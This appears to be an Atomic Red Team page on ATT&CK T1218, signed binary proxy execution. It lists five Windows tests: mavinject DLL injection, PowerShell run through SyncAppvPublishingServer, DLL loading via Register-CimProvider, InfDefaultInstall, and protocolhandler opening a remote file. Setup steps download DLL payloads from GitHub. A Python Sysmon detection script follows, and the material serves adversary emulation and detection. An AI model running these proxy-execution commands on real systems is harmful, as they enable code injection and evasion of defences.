
Signed Binary Proxy Execution

Description from ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as `split` to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

Atomic Tests

Atomic Test #1 - mavinject - Inject DLL into running process

Injects an arbitrary DLL into a running process specified by process ID. Requires Windows 10.

Supported Platforms: windows

auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_id | PID of process receiving injection | string | 1000 |
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"

Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: windows

auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |

Attack Commands: Run with command_prompt!

SyncAppvPublishingServer.exe "n; #{powershell_code}"

Atomic Test #3 - Register-CimProvider - Execute evil dll

Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that this DLL can also be served over SMB.

Supported Platforms: windows

auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"

Atomic Test #4 - InfDefaultInstall.exe .inf Execution

Tests execution of a .inf file using InfDefaultInstall.exe.

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: windows

auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe #{inf_to_execute}

Dependencies: Run with powershell!

Description: INF file must exist on disk at specified location (#{inf_to_execute})

Check Prereq Commands:

if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"

Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates an attack delivered via documents through the Microsoft Office protocol handler. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: windows

auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16 |
| remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx |

Attack Commands: Run with command_prompt!

#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"

Dependencies: Run with powershell!

Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided

Check Prereq Commands:

if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}

Get Prereq Commands:

write-host "Install Microsoft Word or provide correct path."
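The five tests above are useful only if the telemetry they generate can be recognised afterwards. The following Python is an added detection example, not part of Atomic Red Team or the ATT&CK page: it scans process-creation events (field names follow Sysmon Event ID 1: Image, CommandLine) for the five signed-binary invocations used by the tests and reports which test each event corresponds to, plus whether the payload argument points at a remote location (a UNC path or URL, since Test #3 notes the DLL can be served over SMB and Test #5 fetches a document over HTTPS). The sample events are constructed from the default input values on this page and are not real telemetry.

```python
"""Detection logic for the T1218 Atomic tests on this page (added example,
not Atomic Red Team code). Events are Sysmon Event ID 1 style dicts."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Rule:
    name: str      # which Atomic test above the rule covers
    image: str     # regex applied to Image (full path of the new process)
    cmdline: str   # regex applied to CommandLine


# One rule per Atomic test above. All patterns are matched case-insensitively
# because Windows paths and switches are case-insensitive.
RULES = (
    Rule("Atomic #1 mavinject DLL injection",
         r"\\mavinject\.exe$", r"/INJECTRUNNING\b"),
    # Test #2 passes "n; <code>": a quoted argument containing a semicolon is
    # what turns the binary into a PowerShell proxy.
    Rule("Atomic #2 SyncAppvPublishingServer inline PowerShell",
         r"\\SyncAppvPublishingServer\.exe$", r'"[^"]*;[^"]*"'),
    Rule("Atomic #3 Register-CimProvider DLL load",
         r"\\Register-CimProvider\.exe$", r"-Path\s+\S+\.dll\b"),
    Rule("Atomic #4 InfDefaultInstall .inf execution",
         r"\\InfDefaultInstall\.exe$", r"\S+\.inf\b"),
    Rule("Atomic #5 protocolhandler remote document",
         r"\\protocolhandler\.exe$", r"ms-word:[^\s\"|]*\|u\|https?://"),
)

# A payload argument counts as remote if it is a UNC path (\\server\share\...)
# or an http(s) URL; both raise the priority of a hit.
REMOTE_ARG = re.compile(r"(?:^|\s|\|)(?:\\\\[^\s\"]+|https?://[^\s\"]+)", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    command_line: str
    remote_payload: bool


def match_event(event: dict) -> Optional[Finding]:
    """Return a Finding for the first rule the event satisfies, else None."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    for rule in RULES:
        if re.search(rule.image, image, re.I) and re.search(rule.cmdline, cmd, re.I):
            return Finding(rule.name, cmd, bool(REMOTE_ARG.search(cmd)))
    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run every event through the rules and keep the hits, in input order."""
    return [f for f in (match_event(e) for e in events) if f is not None]


# Constructed sample events built from the default inputs of the tests above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mavinject.exe",
     "CommandLine": r"mavinject.exe 1000 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll"},
    {"Image": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "CommandLine": 'SyncAppvPublishingServer.exe "n; Start-Process calc.exe"'},
    # Test #3 with the DLL served over SMB, as the test description mentions.
    {"Image": r"C:\Windows\SysWOW64\Register-CimProvider.exe",
     "CommandLine": r"C:\Windows\SysWow64\Register-CimProvider.exe -Path \\fileserver\share\T1218-2.dll"},
    {"Image": r"C:\Windows\System32\InfDefaultInstall.exe",
     "CommandLine": r"InfDefaultInstall.exe C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf"},
    {"Image": r"C:\Program Files\Microsoft Office\Office16\protocolhandler.exe",
     "CommandLine": '"C:\\Program Files\\Microsoft Office\\Office16\\protocolhandler.exe" '
                    '"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"'},
    # Benign control: a signed binary no rule should match.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"},
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        flag = " [remote payload]" if hit.remote_payload else ""
        print(f"{hit.rule}{flag}: {hit.command_line}")
```

The rules key on the Image path rather than the command line's first token because the page's own tests invoke the binaries both by bare name and by full path; anchoring on the argument that makes each binary a proxy (`/INJECTRUNNING`, a semicolon-separated quoted argument, `-Path ...dll`, a `.inf` argument, an `ms-word:` URI with a URL) keeps ordinary use of the same binaries out of the results.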
